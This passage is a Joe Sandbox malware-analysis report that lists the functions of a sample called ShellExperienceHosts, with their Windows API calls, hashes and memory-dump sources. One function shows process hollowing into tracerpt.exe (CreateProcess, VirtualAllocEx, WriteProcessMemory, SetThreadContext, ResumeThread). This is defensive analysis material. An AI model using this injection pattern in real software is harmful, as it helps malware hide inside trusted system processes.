                                                                            • Opcode Fuzzy Hash: 06b95f28783c42a62d0dd3f0555b4c7354c8569cd33c09753ea8586443556610
                                                                            • Instruction Fuzzy Hash: 7DE04F309A83048BC610BF28A46459AB7F4AB05718F534C26E884DB714D638FC41DAB7
                                                                            Function 6C6D82F4 Relevance: 1.3, APIs: 1, Instructions: 16sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 12947955bdf09c3457107f1e9fe75457b25a645eb634d8d18eb521a92b5c9388
                                                                            • Instruction ID: 7f54a20f5963c6768d95a2c533291cda28318cb7a0a45ca3f268458daf73bac1
                                                                            • Opcode Fuzzy Hash: 12947955bdf09c3457107f1e9fe75457b25a645eb634d8d18eb521a92b5c9388
                                                                            • Instruction Fuzzy Hash: 70D05EB1C441446AEB01FBA05C097CE3A385F13308F4B40A1E616B1655EB29B21ECBEF
                                                                            Function 10005EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • Sleep.KERNEL32 ref: 10005EB2
                                                                              • Part of subcall function 10006F17: _malloc.LIBCMT ref: 10006F31
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep_malloc
                                                                            • String ID:
                                                                            • API String ID: 617756273-0
                                                                            • Opcode ID: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                            • Instruction ID: c703cf204976232012e29921027dce2d5ea17eb50e6b597cbfa29dc34b4da51f
                                                                            • Opcode Fuzzy Hash: bd1a2801bd1f1b37b244e82fcf0364694be79379b717d5536a6d8ec7b8dccb93
                                                                            • Instruction Fuzzy Hash: 6CD0A772D08202CBE7B0EDD048C403D6052A758284F74803DD6059D001D5718D849382
                                                                            Function 004A152F Relevance: 1.0, Instructions: 1003COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3541795510.000000000049F000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.3541444131.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541485259.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541539736.000000000040C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541539736.0000000000414000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3541539736.0000000000456000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eda3440530c695fabe89684c08ced21f14d361cbd0f309897fafc30276024117
                                                                            • Instruction ID: 43da5d217c0980cd259a2d2a29eecca7fa398e6e45ce52ccb5a58d6b0a96cd39
                                                                            • Opcode Fuzzy Hash: eda3440530c695fabe89684c08ced21f14d361cbd0f309897fafc30276024117
                                                                            • Instruction Fuzzy Hash:

                                                                            Non-executed Functions

                                                                            Function 6C74CCDF Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 197windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?), ref: 6C74CD1C
                                                                            • IsWindowVisible.USER32(?), ref: 6C74CD37
                                                                            • GetWindowRect.USER32(?,?), ref: 6C74CD99
                                                                            • IsIconic.USER32(?), ref: 6C74CDA8
                                                                            • CopyRect.USER32(?,?), ref: 6C74CDD6
                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 6C74CE0D
                                                                            • GetMonitorInfoW.USER32(00000000), ref: 6C74CE14
                                                                            • CopyRect.USER32(?,?), ref: 6C74CE26
                                                                            • CopyRect.USER32(?,?), ref: 6C74CE34
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C74CE6A
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C74CE99
                                                                            • GetSystemMetrics.USER32(00000022), ref: 6C74CF20
                                                                            • GetSystemMetrics.USER32(00000023), ref: 6C74CF2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$CopySystemWindow$InfoMetricsMonitorVisible$FromIconicOffsetParametersPoint
                                                                            • String ID: ($,
                                                                            • API String ID: 388708526-170869519
                                                                            • Opcode ID: 2a9f2d33a844e41e28e87c9dcefb5ed2beeac205fbd3536e70e036a384ff2132
                                                                            • Instruction ID: 5c7bd0703194b36d2ec4e12142dba6d957b128a870df94f69f7b8291ea028f63
                                                                            • Opcode Fuzzy Hash: 2a9f2d33a844e41e28e87c9dcefb5ed2beeac205fbd3536e70e036a384ff2132
                                                                            • Instruction Fuzzy Hash: 75714871E1121A9FDB14DFA4CA49BEEBBB9BF08309F108169A515E7650DB30A948CF90
                                                                            Function 10005820 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 135threadinjectionprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 10005849
                                                                            • _memset.LIBCMT ref: 10005868
                                                                            • _memset.LIBCMT ref: 1000589D
                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 100058B1
                                                                              • Part of subcall function 100059E0: _vswprintf_s.LIBCMT ref: 100059F1
                                                                            • GetFileAttributesA.KERNEL32(?), ref: 100058E0
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 10005928
                                                                            • VirtualAllocEx.KERNEL32(?,00000000,000311BF,00003000,00000040,74DF0630), ref: 1000594E
                                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005968
                                                                            • GetThreadContext.KERNEL32(?,?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 10005987
                                                                            • SetThreadContext.KERNEL32(?,00010007,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059A2
                                                                            • ResumeThread.KERNEL32(?,?,00000000,?,000311BF,00000000,?,00000000,000311BF,00003000,00000040,74DF0630), ref: 100059C1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Thread_memset$ContextProcess$AllocAttributesCreateDirectoryFileMemoryResumeSystemVirtualWrite_vswprintf_s
                                                                            • String ID: %s%s$D$Windows\SysWOW64\tracerpt.exe$Windows\System32\tracerpt.exe
                                                                            • API String ID: 2170139861-1986163084
                                                                            • Opcode ID: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                            • Instruction ID: 983fe607fc0b82aa02984a3f7cf9d741954c75fc9833714969104a2613b4b09b
                                                                            • Opcode Fuzzy Hash: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                            • Instruction Fuzzy Hash: C8418EB0A00318EFE720CF60DC85FAA77B8EF48745F10859DF64D9B185DBB1AA848B54
                                                                            Function 6C720ABE Relevance: 21.3, APIs: 14, Instructions: 309windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 6C720B53
                                                                            • RedrawWindow.USER32(?,00000000,00000000,00000505), ref: 6C720B71
                                                                            • ReleaseCapture.USER32 ref: 6C720B77
                                                                            • SetCapture.USER32(?), ref: 6C720B8A
                                                                            • ReleaseCapture.USER32 ref: 6C720C17
                                                                            • SetCapture.USER32(?), ref: 6C720C2A
                                                                            • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C720D1E
                                                                            • UpdateWindow.USER32(?), ref: 6C720DAA
                                                                            • SendMessageW.USER32(?,00000111,00000000,00000000), ref: 6C720DF9
                                                                            • IsWindow.USER32(?), ref: 6C720E05
                                                                            • IsIconic.USER32(?), ref: 6C720E10
                                                                            • IsZoomed.USER32(?), ref: 6C720E1B
                                                                            • IsWindow.USER32(?), ref: 6C720E39
                                                                            • UpdateWindow.USER32(?), ref: 6C720E95
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Capture$MessageReleaseSendUpdate$EmptyIconicRectRedrawZoomed
                                                                            • String ID:
                                                                            • API String ID: 2500574155-0
                                                                            • Opcode ID: fcde9a377bca8221b8afdf2035cb02f67f653adaf8dd2a4cf582b1d5d08b2799
                                                                            • Instruction ID: dcff7db99b1488bba8ae570bfd9d4c6310412c07fc3e39f071b92c81b9f1e3ae
                                                                            • Opcode Fuzzy Hash: fcde9a377bca8221b8afdf2035cb02f67f653adaf8dd2a4cf582b1d5d08b2799
                                                                            • Instruction Fuzzy Hash: 30C19571B006159FCF159F64CA98AAD7BB5FF49318F140279EC26AB791CB34A901CFA0
                                                                            Function 6C7A2B58 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2B6A
                                                                            • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6C7A2B7A
                                                                            • EncodePointer.KERNEL32(00000000,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2B83
                                                                            • DecodePointer.KERNEL32(00000000,?,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2B91
                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000004,?,00000003,?,6C6E51A5,6C6E3B1C,00000003,?,00000004,6C6E3B1C), ref: 6C7A2BC8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeHandleInfoLocaleModuleProc
                                                                            • String ID: GetLocaleInfoEx$kernel32.dll
                                                                            • API String ID: 1461536855-1547310189
                                                                            • Opcode ID: 2a1678dba5230f4f1e7995729c9d2e55eb853a287d302e4e88f5f601543ea4be
                                                                            • Instruction ID: 6ca97408a1436b118e82dacdabf770831515d2f6b5c1fe1882873e9aefbd2fe2
                                                                            • Opcode Fuzzy Hash: 2a1678dba5230f4f1e7995729c9d2e55eb853a287d302e4e88f5f601543ea4be
                                                                            • Instruction Fuzzy Hash: 09014B3560121ABBCF229FA1DE0CC9A3B79AF4A3997000531FD19D2620E735D862DBE1
                                                                            Function 6C71483C Relevance: 9.4, APIs: 6, Instructions: 398COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 2427045233-0
                                                                            • Opcode ID: 7de843d756b3f95ef9a72298f0745d69ea16a0a6839b7089ec85f8ad668a8278
                                                                            • Instruction ID: 6e6e61feecd403d459be611c7f49b1c4f9ef16116ace4a27f4a090bc1d4d5448
                                                                            • Opcode Fuzzy Hash: 7de843d756b3f95ef9a72298f0745d69ea16a0a6839b7089ec85f8ad668a8278
                                                                            • Instruction Fuzzy Hash: 3DE1C2716042159BDF11DF60CE88BED37B8BF48718F180279ED15AFA85DB309905DBA8
                                                                            Function 6C6F4DAC Relevance: 9.2, APIs: 6, Instructions: 176keyboardwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000017), ref: 6C6F4DED
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 6C6F4DFC
                                                                            • WindowFromPoint.USER32(?,?), ref: 6C6F4E35
                                                                            • ScreenToClient.USER32(?,?), ref: 6C6F4E83
                                                                            • SendMessageW.USER32(?,?,?,00000000), ref: 6C6F4EF6
                                                                            • ScreenToClient.USER32(?,?), ref: 6C6F4F63
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClientScreen$AsyncFromMessageMetricsPointSendStateSystemWindow
                                                                            • String ID:
                                                                            • API String ID: 1550688781-0
                                                                            • Opcode ID: 79d6a03ae6c75525c09d6abfeb60308cd4dd87099003760de936527ba62f9d6d
                                                                            • Instruction ID: 7ba26f63a1aeba1d6c64d63cb62c600d2b1ae28e326a9eae3d3800943f152f4b
                                                                            • Opcode Fuzzy Hash: 79d6a03ae6c75525c09d6abfeb60308cd4dd87099003760de936527ba62f9d6d
                                                                            • Instruction Fuzzy Hash: D661A471B0121A9FDF15CF64C9449FEB7B6FF88304F144129E91AA3A50DB70A952CBD4
                                                                            Function 031A660F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: swprintf$_memset
                                                                            • String ID: :$@
                                                                            • API String ID: 1292703666-1367939426
                                                                            • Opcode ID: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                            • Instruction ID: 4eace5d007c5c9f4b83aad07d3ef02eaf5685708244b10d92b01b4cb7ab77d59
                                                                            • Opcode Fuzzy Hash: 3ce09b44c703f379a6cffab786f078c12705430181853880a2577985a84515e9
                                                                            • Instruction Fuzzy Hash: 73315EB6D0021CABDB14CBE9CC85FEEB7B9FB88300F504219E91AAB241E7746905CB54
                                                                            Function 022367EC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 02237914
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02237929
                                                                            • UnhandledExceptionFilter.KERNEL32(10015350), ref: 02237934
                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 02237950
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 02237957
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                            • String ID:
                                                                            • API String ID: 2579439406-0
                                                                            • Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                            • Instruction ID: d0e104486307f489badf2c1b35e03d9b2ba21dc814f3655f22594bff9a54228e
                                                                            • Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                            • Instruction Fuzzy Hash: 5921DFB4814224EFF702DFA9C9C96597BF5BB0A325F40D01AE5088B261EBB5D5C0CF80
                                                                            Function 10006815 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32 ref: 1000793D
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10007952
                                                                            • UnhandledExceptionFilter.KERNEL32(10015350), ref: 1000795D
                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 10007979
                                                                            • TerminateProcess.KERNEL32(00000000), ref: 10007980
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                            • String ID:
                                                                            • API String ID: 2579439406-0
                                                                            • Opcode ID: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                            • Instruction ID: 193b6f3057f50b32987db54b87c2b31a729b11eea6cfb014211f1eca9ce5fffe
                                                                            • Opcode Fuzzy Hash: 57dfde80044b951cb17f91093e50248a3407fe2147c9df5aa397585be7e6a5f4
                                                                            • Instruction Fuzzy Hash: 7221AFB4818264EFF702DF68CDC96597BE5FB0A355F509019E5088B261EB75D5C0CF81
                                                                            Function 6C6B84FC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119encryptionCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B8545
                                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 6C6B85BD
                                                                              • Part of subcall function 6C6B864E: ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8675
                                                                              • Part of subcall function 6C84C646: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,20000000,6C6D830C), ref: 6C84C6A7
                                                                            • ___std_exception_copy.LIBVCRUNTIME ref: 6C6B8612
                                                                            Strings
                                                                            • Failed to calculate base64 decoded size., xrefs: 6C6B85DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: BinaryCryptString___std_exception_copy$ExceptionRaise
                                                                            • String ID: Failed to calculate base64 decoded size.
                                                                            • API String ID: 1999913932-3365390155
                                                                            • Opcode ID: 4f58b8bf4554b9b595101869390cc6bce9991d0d8d6f6cb1e25ba405812c33f7
                                                                            • Instruction ID: 44781b12f5f5e729e76bb56911e955b4725a20836f6d0c402de19b78cc323fc9
                                                                            • Opcode Fuzzy Hash: 4f58b8bf4554b9b595101869390cc6bce9991d0d8d6f6cb1e25ba405812c33f7
                                                                            • Instruction Fuzzy Hash: FD419AF2901209AFDB20DF58CD84ADABBBCFF49318F048929E445AB751D730E954CBA5
                                                                            Function 6C6F2E3D Relevance: 6.1, APIs: 4, Instructions: 52windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetForegroundWindow.USER32(?), ref: 6C6F2E73
                                                                            • IsIconic.USER32(?), ref: 6C6F2E7C
                                                                              • Part of subcall function 6C770CB0: ShowWindow.USER32(?,?,?,?,6C761B94,00000005,0000EA20), ref: 6C770CC1
                                                                            • PostMessageW.USER32(?,00000000,?,00000005), ref: 6C6F2EA4
                                                                            • IsIconic.USER32(?), ref: 6C6F2EAD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
